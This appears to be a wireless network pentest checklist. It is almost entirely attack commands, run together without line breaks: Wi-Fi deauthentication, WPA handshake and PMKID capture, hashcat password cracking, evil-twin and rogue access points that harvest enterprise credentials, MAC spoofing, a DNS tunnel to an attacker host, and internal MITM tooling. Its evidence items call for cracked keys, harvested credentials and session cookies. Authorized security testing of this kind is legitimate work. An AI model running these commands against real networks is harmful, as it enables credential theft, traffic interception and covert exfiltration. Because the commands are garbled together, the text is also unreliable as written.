Wireless Network Pentest Checklist
A wireless network security testing checklist covering Wi-Fi infrastructure, authentication mechanisms, encryption protocols, rogue device detection, and client-side attacks. Applicable to enterprise, guest, and IoT wireless networks.
airmon-ng start wlan0airodump-ng wlan0monairodump-ng wlan0mon --essid-regex ".*"airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w captureaireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0monhashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txtPCAP of the captured EAPOL four-way handshake plus the hashcat session output showing the cracked PSK.
hostapd-mana hostapd-mana.confeaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --credseaphammer or hostapd-mana log showing a captured MSCHAPv2 challenge/response, plus the cracked plaintext credentials from asleap or hashcat.
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1hcxpcapngtool -o hash.hc22000 pmkid.pcapnghashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txtmacchanger -m AA:BB:CC:DD:EE:FF wlan0iodine -P password tunnel.attacker.comeaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds --cert-wizardairbase-ng -e CorpWiFi -c 6 wlan0moneaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --credsscreenshot of the evil-twin SSID broadcast, captured connection from a target client, and the harvested credentials or session cookies.
nmap -sS -Pn <internal_target_range>bettercap -iface wlan0mitm6 -d corp.localarp-scan --interface=wlan0 --localnet